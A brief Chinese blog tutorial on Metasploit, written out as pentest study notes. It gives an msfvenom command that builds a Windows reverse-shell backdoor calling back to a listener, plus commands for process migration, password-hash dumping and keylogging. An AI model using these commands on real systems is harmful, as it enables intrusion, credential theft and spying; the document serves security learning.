msf

Metasploit

Posted by Tattoo on 2019-12-18
Estimated Reading Time 1 Minutes
Words 463 In Total
Viewed Times

Metasploit

一个开源免费的攻击框架,集成了多种已知漏洞,可用于执行渗透测试的强大工具,具有良好的扩展性,通过它可以很容易地对计算机漏洞实施攻击。

全局设置

通过全局设置不用每次攻击前都重复设置一些常用参数

使用setg命令进行全局设置

setg LHOST ip 设置本机攻击IP地址

setg LPORT port 设置本机监听端口

setg THREADS num 设置攻击线程数

msfvenom生成后门

msfvenom用于生成木马程序,在目标机上执行,在本地监听

端口尽量使用4444,因为模块中几乎所有都监听端口都用4444,这样可以省去很多端口设置

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.129 lport=4444 -f exe > shell.exe

Metasploit Session

在meterpreter中退出会话使用exit,退到后台用background,删除session用session -k sessionID

migrate

返回meterpreter后,要及时迁移进程到稳定的服务进程中,如果是对系统Internet Explorer服务进行漏洞利用,主机关闭了浏览器,meterpreter也会被关闭,失去连接导致攻击失败

迁移进程使用migrate

当前进程pid是3640

查找所有进程的id,命令ps

查找具有管理员权限的进程并迁移

将当前进程前移到pid为3640的进程explorer.exe中,命令migrate 1616

hashdump

获取目标机上的哈希密码,前提是需要系统管理员权限

hashdump

使用hashdump获取哈希没有成功,但是有提示推荐我们使用post/windows/gather/smart_hashdump脚本

run post/windows/gather/smart_hashdump

成功抓取用户哈希密码

Keylog_recorder

keylog_recorder模块用于键盘记录,可以获取目标机的键盘按键记录,CTRL+C停止获取

run post/windows/capture/keylog_recorder

更多功能等待被学习…..


If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !